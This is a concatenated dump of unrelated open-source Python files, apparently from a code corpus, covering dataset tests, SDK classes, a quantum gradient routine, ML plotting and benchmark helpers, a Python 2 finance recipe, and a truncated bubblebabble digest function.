task = GQA("gqa_validation", config["gqa_validation"])
# Mock up the get_image method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.get_image", MagicMock( side_effect = [ "0" ] )):
sample = task[0]
# Check sample.
self.assertEqual(sample['indices'], 0)
self.assertEqual(sample['sample_ids'], '05451384')
self.assertEqual(sample['image_ids'], '2382986')
self.assertEqual(sample['questions'], 'Are there blankets under the brown cat?')
self.assertEqual(sample['answers'], 'no')
self.assertEqual(sample['full_answers'], 'No, there is a towel under the cat.')
def test_test_dev_split(self):
"""
Tests the test_dev split.
..note:
Test on real data is performed only if adequate json source file is found.
"""
# Empty config.
config = ConfigInterface()
config.add_config_params({"gqa_testdev": {"split": "test_dev", "globals": {"image_height": "gqa_image_height", "image_width": "gqa_image_width"}}})
# Check the existence of test set.
if False: #check_file_existence(path.expanduser('~/data/gqa/questions1.2'),'testdev_all_questions.json'):
# Create object.
task = GQA("gqa_testdev", config["gqa_testdev"])
# Check dataset size.
self.assertEqual(len(task), 172174)
# Get sample.
sample = task[0]
else:
processed_dataset_content = [ {'sample_ids': '20968379', 'image_ids': 'n288870', 'questions': 'Do the shorts have dark color?', 'answers': 'yes', 'full_answers': 'Yes, the shorts are dark.'} ]
# Mock up the load_dataset method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.load_dataset", MagicMock( side_effect = [ processed_dataset_content ] )):
task = GQA("gqa_testdev", config["gqa_testdev"])
# Mock up the get_image method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.get_image", MagicMock( side_effect = [ "0" ] )):
sample = task[0]
# Check sample.
self.assertEqual(sample['indices'], 0)
self.assertEqual(sample['sample_ids'], '20968379')
self.assertEqual(sample['image_ids'], 'n288870')
self.assertEqual(sample['questions'], 'Do the shorts have dark color?')
self.assertEqual(sample['answers'], 'yes')
self.assertEqual(sample['full_answers'], 'Yes, the shorts are dark.')
def test_test_split(self):
"""
Tests the test split.
..note:
Test on real data is performed only if adequate json source file is found.
"""
# Empty config.
config = ConfigInterface()
config.add_config_params({"gqa_test": {"split": "test", "globals": {"image_height": "gqa_image_height", "image_width": "gqa_image_width"}}})
# Check the existence of test set.
if False: #check_file_existence(path.expanduser('~/data/gqa/questions1.2'),'test_all_questions.json'):
# Create object.
task = GQA("gqa_test", config["gqa_test"])
# Check dataset size.
self.assertEqual(len(task), 1340048)
# Get sample.
sample = task[0]
else:
processed_dataset_content = [ {'sample_ids': '201971873', 'image_ids': 'n15740', 'questions': 'Is the blanket to the right of a pillow?', 'answers': '<UNK>', 'full_answers': '<UNK>'} ]
# Mock up the load_dataset method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.load_dataset", MagicMock( side_effect = [ processed_dataset_content ] )):
task = GQA("gqa_test", config["gqa_test"])
# Mock up the get_image method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.get_image", MagicMock( side_effect = [ "0" ] )):
sample = task[0]
# Check sample.
self.assertEqual(sample['indices'], 0)
self.assertEqual(sample['sample_ids'], '201971873')
self.assertEqual(sample['image_ids'], 'n15740')
self.assertEqual(sample['questions'], 'Is the blanket to the right of a pillow?')
self.assertEqual(sample['answers'], '<UNK>')
self.assertEqual(sample['full_answers'], '<UNK>')
#if __name__ == "__main__":
# unittest.main() |
contrib/frontends/py/nntpchan/__init__.py | majestrate/nntpchan | 233 | 31389 | <filename>contrib/frontends/py/nntpchan/__init__.py
#
# entry for gunicorn
#
from nntpchan.app import app
from nntpchan import viewsp
|
alipay/aop/api/domain/TopicItemVo.py | snowxmas/alipay-sdk-python-all | 213 | 31405 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class TopicItemVo(object):
def __init__(self):
self._desc = None
self._id = None
self._status = None
self._title = None
@property
def desc(self):
return self._desc
@desc.setter
def desc(self, value):
self._desc = value
@property
def id(self):
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def title(self):
return self._title
@title.setter
def title(self, value):
self._title = value
def to_alipay_dict(self):
params = dict()
if self.desc:
if hasattr(self.desc, 'to_alipay_dict'):
params['desc'] = self.desc.to_alipay_dict()
else:
params['desc'] = self.desc
if self.id:
if hasattr(self.id, 'to_alipay_dict'):
params['id'] = self.id.to_alipay_dict()
else:
params['id'] = self.id
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
if self.title:
if hasattr(self.title, 'to_alipay_dict'):
params['title'] = self.title.to_alipay_dict()
else:
params['title'] = self.title
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = TopicItemVo()
if 'desc' in d:
o.desc = d['desc']
if 'id' in d:
o.id = d['id']
if 'status' in d:
o.status = d['status']
if 'title' in d:
o.title = d['title']
return o
|
exercises/spiral-matrix/spiral_matrix.py | kishankj/python | 1,177 | 31421 | <filename>exercises/spiral-matrix/spiral_matrix.py
def spiral_matrix(size):
pass
|
grove/alpha/jordan_gradient/jordan_gradient.py | mkeshita/grove | 229 | 31427 | import numpy as np
from pyquil import Program
from pyquil.api import QuantumComputer, get_qc
from grove.alpha.jordan_gradient.gradient_utils import (binary_float_to_decimal_float,
measurements_to_bf)
from grove.alpha.phaseestimation.phase_estimation import phase_estimation
def gradient_program(f_h: float, precision: int) -> Program:
"""
Gradient estimation via Jordan's algorithm (10.1103/PhysRevLett.95.050501).
:param f_h: Oracle output at perturbation h.
:param precision: Bit precision of gradient.
:return: Quil program to estimate gradient of f.
"""
# encode oracle values into phase
phase_factor = np.exp(1.0j * 2 * np.pi * abs(f_h))
U = np.array([[phase_factor, 0],
[0, phase_factor]])
p_gradient = phase_estimation(U, precision)
return p_gradient
def estimate_gradient(f_h: float, precision: int,
gradient_max: int = 1,
n_measurements: int = 50,
qc: QuantumComputer = None) -> float:
"""
Estimate the gradient using function evaluation at perturbation, h.
:param f_h: Oracle output at perturbation h.
:param precision: Bit precision of gradient.
:param gradient_max: OOM estimate of largest gradient value.
:param n_measurements: Number of times to measure system.
:param qc: The QuantumComputer object.
:return: Decimal estimate of gradient.
"""
# scale f_h by range of values gradient can take on
f_h *= 1. / gradient_max
# generate gradient program
perturbation_sign = np.sign(f_h)
p_gradient = gradient_program(f_h, precision)
# run gradient program
if qc is None:
qc = get_qc(f"{len(p_gradient.get_qubits())}q-qvm")
p_gradient.wrap_in_numshots_loop(n_measurements)
executable = qc.compiler.native_quil_to_executable(p_gradient)
measurements = qc.run(executable)
# summarize measurements
bf_estimate = perturbation_sign * measurements_to_bf(measurements)
bf_explicit = '{0:.16f}'.format(bf_estimate)
deci_estimate = binary_float_to_decimal_float(bf_explicit)
# rescale gradient
deci_estimate *= gradient_max
return deci_estimate
|
test/benchmark/jvp_conv2d.py | jabader97/backpack | 395 | 31428 | from torch import randn
from torch.nn import Conv2d
from backpack import extend
def data_conv2d(device="cpu"):
N, Cin, Hin, Win = 100, 10, 32, 32
Cout, KernelH, KernelW = 25, 5, 5
X = randn(N, Cin, Hin, Win, requires_grad=True, device=device)
module = extend(Conv2d(Cin, Cout, (KernelH, KernelW))).to(device=device)
out = module(X)
Hout = Hin - (KernelH - 1)
Wout = Win - (KernelW - 1)
vin = randn(N, Cout, Hout, Wout, device=device)
vout = randn(N, Cin, Hin, Win, device=device)
return {
"X": X,
"module": module,
"output": out,
"vout_ag": vout,
"vout_bp": vout.view(N, -1, 1),
"vin_ag": vin,
"vin_bp": vin.view(N, -1, 1),
}
|
test/com/facebook/buck/core/module/impl/test_app.py | Unknoob/buck | 8,027 | 31469 | <reponame>Unknoob/buck<filename>test/com/facebook/buck/core/module/impl/test_app.py
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import unittest
class TestApp(unittest.TestCase):
"""
This is a Python test that allows to do testing of arbitrary applications
The main purpose of using this approach is to provide an ability to run tests on Windows
(which doesn't support sh_test).
The command is passed to this test using `CMD` environment variable.
"""
def test_app(self):
self.assertEquals(0, subprocess.call(os.environ["CMD"].split(" ")))
|
loopchain/blockchain/blocks/v0_5/block_builder.py | windies21/loopchain | 105 | 31481 | <gh_stars>100-1000
# Copyright 2018-current ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""block builder for version 0.5 block"""
from loopchain.blockchain.blocks import BlockProverType
from loopchain.blockchain.blocks.v0_4 import BlockBuilder
from loopchain.blockchain.blocks.v0_5 import BlockHeader, BlockBody, BlockProver
from loopchain.blockchain.types import Hash32
class BlockBuilder(BlockBuilder):
version = BlockHeader.version
BlockHeaderClass = BlockHeader
BlockBodyClass = BlockBody
def _build_transactions_hash(self):
if not self.transactions:
return Hash32.empty()
block_prover = BlockProver(self.transactions.keys(), BlockProverType.Transaction)
return block_prover.get_proof_root()
|
recipes/Python/576708_DVMVersusCAPM/recipe-576708.py | tdiprima/code | 2,023 | 31495 | <gh_stars>1000+
#On the name of ALLAH and may the blessing and peace of Allah
#be upon the Messenger of Allah <NAME>.
#Author : <NAME>
#Date : 07/03/09
#version :2.6.1
"""
collections module's extras in python 2.6.1 were used in my program, DVMextrapolating
DVMgordonsModel and CAPM subclasses of namedtuple Python class provide the cost of equity
the calculation of the dividend growth g in two different ways, and the value of the company
if the cost of equity Ke is known.
I used an utility method and the try/exceptions statements to raise errors
"""
import math as m
from collections import namedtuple
class MyError:
""" Demonstrate imporper operation on negative number"""
def _negativeNumberException(self,*args):
""" Utility method to raise a negative number exception"""
for item in args:
if item <0:
raise ValueError,\
" <The value %s should be a positive number " % item
class DVMextrapolating(namedtuple('DVMextrapolating','dividend_just_paid,dividend_n_years,n,share_price,Ke'),MyError):
""" DVMeModel class inherits from tuple and MyError class """
#set __slots__ to an empty tuple keep memory requirements low
__slots__ = ()
#Pick Myerror method
_negativeNumberException =MyError._negativeNumberException
@property
def g_extrapolatingModel(self):
""" Compute g using extrapolating """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.dividend_just_paid,self.dividend_n_years,self.n)
return "%2.2f" % ((float(m.pow((self.dividend_just_paid/self.dividend_n_years),(1/float(self.n)))) -1))
#Raise TypeError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
#division by zero raises ZeroDivisionError exception
except ZeroDivisionError:
raise ZeroDivisionError, "\n<Please check and re-enter the values"
@property
def valueOfShare(self):
""" Compute the share value """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.dividend_just_paid,self.dividend_n_years,self.Ke)
return "%2.2f" % (((self.dividend_just_paid*
(1+float(self.g_extrapolatingModel)))/(self.Ke-float(self.g_extrapolatingModel))))
#Raise TypeError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
#division by zero raises ZeroDivisionError exception
except ZeroDivisionError:
raise ZeroDivisionError, "\n<Please check and re-enter the values"
@property
def costOfEquity(self):
""" Compute cost of equity using DVM Model """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.dividend_just_paid,self.share_price)
return "%2.1f" % ((((self.dividend_just_paid*
(1+float(self.g_extrapolatingModel))/self.share_price))+ float(self.g_extrapolatingModel))*100)
#Raise TypeError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
#division by zero raises ZeroDivisionError exception
except ZeroDivisionError:
raise ZeroDivisionError, "\n<Please check and re-enter the values"
def __str__(self):
""" String representation of DVMeModel"""
if self.Ke == None:
return "\n< Extrapolating Growth Model g = %s\n \
\n< Cost of equity Ke = %s \n\
\n< Market value of the share Po = %s" % \
(self.g_extrapolatingModel,(self.costOfEquity+'%'),('$'+ str(self.share_price)))
else:
return "\n< Extrapolating Growth Model g = %s\n \
\n< Cost of equity Ke = %s \n\
\n< Market value of the share Po = %s" % \
(self.g_extrapolatingModel,self.Ke,('$'+ str(self.valueOfShare)))
class DVMgordonsModel(namedtuple('DVMgordonsModel','dividend_just_paid,return_on_equity,dividend_payout,share_price,Ke'),MyError):
""" DVMgModel class inherits from tuple and MyError classes """
#set __slots__ to an empty tuple keep memory requirements low
__slots__ = ()
#Pick Myerror method
_negativeNumberException =MyError._negativeNumberException
@property
def g_gordonsModel(self):
""" Compute g using Gordons growth Model """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.return_on_equity,self.dividend_payout)
return self.return_on_equity * (1-self.dividend_payout)
#Raise TypeError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
@property
def valueOfShare(self):
""" Compute the share value """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.dividend_just_paid,self.Ke)
return "%2.2f" % (((self.dividend_just_paid*
(1+float(self.g_gordonsModel)))/(self.Ke-self.g_gordonsModel)))
#Raise TypeError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
#division by zero raises ZeroDivisionError exception
except ZeroDivisionError:
raise ZeroDivisionError, "\n<Please check and re-enter the values"
@property
def costOfEquity(self):
""" Compute cost of equity using DVM Model """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.dividend_just_paid,self.share_price)
return "%2.1f" % ((((self.dividend_just_paid*
(1+float(self.g_gordonsModel)))/(self.share_price))+ float(self.g_gordonsModel))*100 )
#Raise TypeError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
#division by zero raises ZeroDivisionError exception
except ZeroDivisionError:
raise ZeroDivisionError, "\n<Please check and re-enter the values"
def __str__(self):
""" String representation of DVMgModel"""
if self.Ke == None:
return "\n< Gordon's Growth Model g = %s\n \
\n< Cost of equity Ke = %s \n\
\n< Market value of the share Po = %s" % \
(self.g_gordonsModel,(self.costOfEquity+'%'),('$'+ str(self.share_price)))
else:
return "\n< Gordon's Growth Model g = %s\n \
\n< Cost of equity Ke = %s \n\
\n< Market value of the share Po = %s" % \
(self.g_gordonsModel,self.Ke,('$'+ str(self.valueOfShare)))
class CAPM(namedtuple('CAPM','Rf,Beta,Rm'),MyError):
""" CAPM class inherits from tuple and MyError class """
#set __slots__ to an empty tuple keep memory requirements low
__slots__ = ()
#Pick Myerror method
_negativeNumberException =MyError._negativeNumberException
@property
def Ke(self):
""" Compute cost of equity using CAPM model """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.Rf,self.Beta,self.Rm)
return self.Rf + self.Beta*(self.Rm - self.Rf)
#Raise ValueError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
def __str__(self):
""" String representation of CAPM"""
return "\n< Ke = %s" % self.Ke+"%"
if __name__ == '__main__':
a = CAPM('Rf','Beta','Rm')
b = [7,0.7,17]
a = a._make(b)
print "\n"+"\4"*43
print a
print "\n"+"\4"*43
c = DVMextrapolating('dividend_just_paid','dividend_n_years','n','share_price','Ke')
d = [0.24,0.1525,4,None,a.Ke/100]
c = c._make(d)
print c
print "\n"+"\4"*43
e = DVMgordonsModel('dividend_just_paid','return_on_equity','dividend_payout','share_price','Ke')
f = [0.18,0.2,0.72,None,0.127]
e = e._make(f)
print e
print "\n"+"\4"*43
g = [0.25,0.17,7,17.50,None]
c = c._make(g)
print c
print "\n"+"\4"*43
h = [0.17,0.3,0.37,1.77,None]
e = e._make(h)
print e
print "\n"+"\4"*43
print
print c.g_extrapolatingModel
print c.costOfEquity
print e.g_gordonsModel
print e.costOfEquity
print "\n"+"\5"*43
m = [None,0.5,0.57,None,None]
e = e._make(m)
print e.g_gordonsModel
##########################################################################################
# c:\Python26>python "C:\Users\<NAME>\Documents\python\DVM_Versus_CAPM7.py"
#♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦
#< Ke = 14.0%
#♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦
#< Extrapolating Growth Model g = 0.12
#< Cost of equity Ke = 0.14
#< Market value of the share Po = $13.44
#♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦
#< Gordon's Growth Model g = 0.056
#< Cost of equity Ke = 0.127
#< Market value of the share Po = $2.68
#♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦
#< Extrapolating Growth Model g = 0.06
#< Cost of equity Ke = 7.5%
#< Market value of the share Po = $17.5
#♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦
#< Gordon's Growth Model g = 0.189
#< Cost of equity Ke = 30.3%
#< Market value of the share Po = $1.77
#♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦
#0.06
#7.5
#0.189
#30.3
#♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣
#0.215
#c:\Python26>
##########################################################################################
#Version : Python 3.2
#import math as m
#from collections import namedtuple
#class MyError:
# """ Demonstrate imporper operation on negative number"""
# def _negativeNumberException(self,*args):
# """ Utility method to raise a negative number exception"""
#
# for item in args:
# if item <0:
#
# raise ValueError(" <The value %s should be a positive number " % item)
#
#class DVMextrapolating(namedtuple('DVMextrapolating','dividend_just_paid,dividend_n_years,n,share_price,Ke'),MyError):
# """ DVMeModel class inherits from tuple and MyError class """
#
# #set __slots__ to an empty tuple keep memory requirements low
# __slots__ = ()
#
# #Pick Myerror method
# _negativeNumberException =MyError._negativeNumberException
#
# @property
# def g_extrapolatingModel(self):
# """ Compute g using extrapolating """
#
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.dividend_just_paid,self.dividend_n_years,self.n)
# return "%2.2f" % ((float(m.pow((self.dividend_just_paid/self.dividend_n_years),(1/float(self.n)))) -1))
#
# #Raise TypeError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# #division by zero raises ZeroDivisionError exception
# except ZeroDivisionError:
# raise ZeroDivisionError("\n<Please check and re-enter the values")
#
# @property
# def valueOfShare(self):
# """ Compute the share value """
#
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.dividend_just_paid,self.dividend_n_years,self.Ke)
# return "%2.2f" % (((self.dividend_just_paid*
# (1+float(self.g_extrapolatingModel)))/(self.Ke-float(self.g_extrapolatingModel))))
#
# #Raise TypeError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# #division by zero raises ZeroDivisionError exception
# except ZeroDivisionError:
# raise ZeroDivisionError("\n<Please check and re-enter the values")
#
# @property
# def costOfEquity(self):
# """ Compute cost of equity using DVM Model """
#
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.dividend_just_paid,self.share_price)
# return "%2.1f" % ((((self.dividend_just_paid*
# (1+float(self.g_extrapolatingModel))/self.share_price))+ float(self.g_extrapolatingModel))*100)
#
# #Raise TypeError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# #division by zero raises ZeroDivisionError exception
# except ZeroDivisionError:
# raise ZeroDivisionError("\n<Please check and re-enter the values")
#
# def __str__(self):
# """ String representation of DVMeModel"""
#
# if self.Ke == None:
# return "\n< Extrapolating Growth Model g = %s\n \
# \n< Cost of equity Ke = %s \n\
# \n< Market value of the share Po = %s" % \
# (self.g_extrapolatingModel,(self.costOfEquity+'%'),('$'+ str(self.share_price)))
# else:
# return "\n< Extrapolating Growth Model g = %s\n \
# \n< Cost of equity Ke = %s \n\
# \n< Market value of the share Po = %s" % \
# (self.g_extrapolatingModel,self.Ke,('$'+ str(self.valueOfShare)))
#
#class DVMgordonsModel(namedtuple('DVMgordonsModel','dividend_just_paid,return_on_equity,dividend_payout,share_price,Ke'),MyError):
# """ DVMgModel class inherits from tuple and MyError classes """
#
# #set __slots__ to an empty tuple keep memory requirements low
# __slots__ = ()
#
# #Pick Myerror method
# _negativeNumberException =MyError._negativeNumberException
#
# @property
# def g_gordonsModel(self):
# """ Compute g using Gordons growth Model """
#
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.return_on_equity,self.dividend_payout)
# return self.return_on_equity * (1-self.dividend_payout)
# #Raise TypeError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# @property
# def valueOfShare(self):
# """ Compute the share value """
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.dividend_just_paid,self.Ke)
# return "%2.2f" % (((self.dividend_just_paid*
# (1+float(self.g_gordonsModel)))/(self.Ke-self.g_gordonsModel)))
#
# #Raise TypeError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# #division by zero raises ZeroDivisionError exception
# except ZeroDivisionError:
# raise ZeroDivisionError("\n<Please check and re-enter the values")
#
# @property
# def costOfEquity(self):
# """ Compute cost of equity using DVM Model """
#
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.dividend_just_paid,self.share_price)
# return "%2.1f" % ((((self.dividend_just_paid*
# (1+float(self.g_gordonsModel)))/(self.share_price))+ float(self.g_gordonsModel))*100 )
#
# #Raise TypeError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# #division by zero raises ZeroDivisionError exception
# except ZeroDivisionError:
# raise ZeroDivisionError("\n<Please check and re-enter the values")
#
# def __str__(self):
# """ String representation of DVMgModel"""
#
# if self.Ke == None:
#
# return "\n< Gordon's Growth Model g = %s\n \
# \n< Cost of equity Ke = %s \n\
# \n< Market value of the share Po = %s" % \
# (self.g_gordonsModel,(self.costOfEquity+'%'),('$'+ str(self.share_price)))
#
# else:
# return "\n< Gordon's Growth Model g = %s\n \
# \n< Cost of equity Ke = %s \n\
# \n< Market value of the share Po = %s" % \
# (self.g_gordonsModel,self.Ke,('$'+ str(self.valueOfShare)))
#
#class CAPM(namedtuple('CAPM','Rf,Beta,Rm'),MyError):
# """ CAPM class inherits from tuple and MyError class """
#
# #set __slots__ to an empty tuple keep memory requirements low
# __slots__ = ()
#
# #Pick Myerror method
# _negativeNumberException =MyError._negativeNumberException
#
# @property
# def Ke(self):
# """ Compute cost of equity using CAPM model """
#
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.Rf,self.Beta,self.Rm)
# return self.Rf + self.Beta*(self.Rm - self.Rf)
#
# #Raise ValueError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# def __str__(self):
# """ String representation of CAPM"""
#
# return "\n< Ke = %s" % self.Ke+"%"
#
#if __name__ == '__main__':
# a = CAPM('Rf','Beta','Rm')
# b = [7,0.7,17]
# a = a._make(b)
# print("\n"+"\4"*43)
# print(a)
# print("\n"+"\4"*43)
# c = DVMextrapolating('dividend_just_paid','dividend_n_years','n','share_price','Ke')
# d = [0.24,0.1525,4,None,a.Ke/100]
# c = c._make(d)
# print(c)
#
# print("\n"+"\4"*43)
# e = DVMgordonsModel('dividend_just_paid','return_on_equity','dividend_payout','share_price','Ke')
#
# f = [0.18,0.2,0.72,None,0.127]
# e = e._make(f)
# print(e)
# print("\n"+"\4"*43)
# g = [0.25,0.17,7,17.50,None]
# c = c._make(g)
# print(c)
#
# print("\n"+"\4"*43)
# h = [0.17,0.3,0.37,1.77,None]
# e = e._make(h)
# print(e)
#
# print("\n"+"\4"*43)
# print()
# print(c.g_extrapolatingModel)
# print(c.costOfEquity)
# print(e.g_gordonsModel)
# print(e.costOfEquity)
# print("\n"+"\5"*43)
# m = [None,0.5,0.57,None,None]
# e = e._make(m)
# print(e.g_gordonsModel)
|
tutorials/W1D3_MultiLayerPerceptrons/solutions/W1D3_Tutorial1_Solution_d58d2933.py | amita-kapoor/course-content-dl | 473 | 31513 |
"""
At infinite membrane resistance, the Neuron does not leak any current out,
and hence it starts firing with the slightest input current,
This shifts the transfer function towards 0, similar to ReLU activation (centered at 0).
Also, when there is minimal refractory time, the neuron can keep firing
at a high input current which avoids the saturation.
"""; |
arviz/plots/backends/matplotlib/separationplot.py | sudojarvis/arviz | 1,159 | 31540 | <reponame>sudojarvis/arviz
"""Matplotlib separation plot."""
import matplotlib.pyplot as plt
import numpy as np
from ...plot_utils import _scale_fig_size
from . import backend_kwarg_defaults, backend_show, create_axes_grid
def plot_separation(
y,
y_hat,
y_hat_line,
label_y_hat,
expected_events,
figsize,
textsize,
color,
legend,
locs,
width,
ax,
plot_kwargs,
y_hat_line_kwargs,
exp_events_kwargs,
backend_kwargs,
show,
):
"""Matplotlib separation plot."""
if backend_kwargs is None:
backend_kwargs = {}
if plot_kwargs is None:
plot_kwargs = {}
# plot_kwargs.setdefault("color", "C0")
# if color:
plot_kwargs["color"] = color
if y_hat_line_kwargs is None:
y_hat_line_kwargs = {}
y_hat_line_kwargs.setdefault("color", "k")
if exp_events_kwargs is None:
exp_events_kwargs = {}
exp_events_kwargs.setdefault("color", "k")
exp_events_kwargs.setdefault("marker", "^")
exp_events_kwargs.setdefault("s", 100)
exp_events_kwargs.setdefault("zorder", 2)
backend_kwargs = {
**backend_kwarg_defaults(),
**backend_kwargs,
}
(figsize, *_) = _scale_fig_size(figsize, textsize, 1, 1)
backend_kwargs.setdefault("figsize", figsize)
backend_kwargs["squeeze"] = True
if ax is None:
_, ax = create_axes_grid(1, backend_kwargs=backend_kwargs)
idx = np.argsort(y_hat)
for i, loc in enumerate(locs):
positive = not y[idx][i] == 0
alpha = 1 if positive else 0.3
ax.bar(loc, 1, width=width, alpha=alpha, **plot_kwargs)
if y_hat_line:
ax.plot(np.linspace(0, 1, len(y_hat)), y_hat[idx], label=label_y_hat, **y_hat_line_kwargs)
if expected_events:
expected_events = int(np.round(np.sum(y_hat)))
ax.scatter(
y_hat[idx][len(y_hat) - expected_events - 1],
0,
label="Expected events",
**exp_events_kwargs
)
if legend and (expected_events or y_hat_line):
handles, labels = ax.get_legend_handles_labels()
labels_dict = dict(zip(labels, handles))
ax.legend(labels_dict.values(), labels_dict.keys())
ax.set_xticks([])
ax.set_yticks([])
ax.set_xlim(0, 1)
ax.set_ylim(0, 1)
if backend_show(show):
plt.show()
return ax
|
Examples/Image/Detection/FastRCNN/BrainScript/B3_VisualizeOutputROIs.py | shyamalschandra/CNTK | 17,702 | 31559 | <filename>Examples/Image/Detection/FastRCNN/BrainScript/B3_VisualizeOutputROIs.py
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
from __future__ import print_function
import os, importlib, sys
from cntk_helpers import imWidthHeight, nnPredict, applyNonMaximaSuppression, makeDirectory, visualizeResults, imshow
import PARAMETERS
####################################
# Parameters
####################################
image_set = 'test' # 'train', 'test'
def visualize_output_rois(testing=False):
p = PARAMETERS.get_parameters_for_dataset()
# no need to change these parameters
boUseNonMaximaSurpression = True
visualizationDir = os.path.join(p.resultsDir, "visualizations")
cntkParsedOutputDir = os.path.join(p.cntkFilesDir, image_set + "_parsed")
makeDirectory(p.resultsDir)
makeDirectory(visualizationDir)
# loop over all images and visualize
imdb = p.imdbs[image_set]
for imgIndex in range(0, imdb.num_images):
imgPath = imdb.image_path_at(imgIndex)
imgWidth, imgHeight = imWidthHeight(imgPath)
# evaluate classifier for all rois
labels, scores = nnPredict(imgIndex, cntkParsedOutputDir, p.cntk_nrRois, len(p.classes), None)
# remove the zero-padded rois
scores = scores[:len(imdb.roidb[imgIndex]['boxes'])]
labels = labels[:len(imdb.roidb[imgIndex]['boxes'])]
# perform non-maxima surpression. note that the detected classes in the image is not affected by this.
nmsKeepIndices = []
if boUseNonMaximaSurpression:
nmsKeepIndices = applyNonMaximaSuppression(p.nmsThreshold, labels, scores, imdb.roidb[imgIndex]['boxes'])
print ("Non-maxima surpression kept {:4} of {:4} rois (nmsThreshold={})".format(len(nmsKeepIndices), len(labels), p.nmsThreshold))
# visualize results
imgDebug = visualizeResults(imgPath, labels, scores, imdb.roidb[imgIndex]['boxes'], p.cntk_padWidth, p.cntk_padHeight,
p.classes, nmsKeepIndices, boDrawNegativeRois=True)
if not testing:
imshow(imgDebug, waitDuration=0, maxDim = 800)
# imwrite(imgDebug, visualizationDir + "/" + str(imgIndex) + os.path.basename(imgPath))
print ("DONE.")
return True
if __name__=='__main__':
visualize_output_rois()
|
src/deepke/name_entity_re/__init__.py | johncolezhang/DeepKE | 710 | 31560 | from .standard import *
from .few_shot import *
|
recipes/Python/299133_bubblebabble/recipe-299133.py | tdiprima/code | 2,023 | 31562 | #! /usr/bin/env python
"""Compute a (somewhat more) human readable format for message
digests. This is port of the perl module Digest-BubbleBabble-0.01
(http://search.cpan.org/~btrott/Digest-BubbleBabble-0.01/)
"""
vowels = "aeiouy"
consonants = "bcdfghklmnprstvzx"
def bubblebabble(digest):
"""compute bubblebabble representation of digest.
@param digest: raw string representation of digest (e.g. what md5.digest returns)
@type digest: str
@return: bubblebabble representation of digest
@rtype: str
"""
digest = [ord(x) for x in digest]
dlen = len(digest)
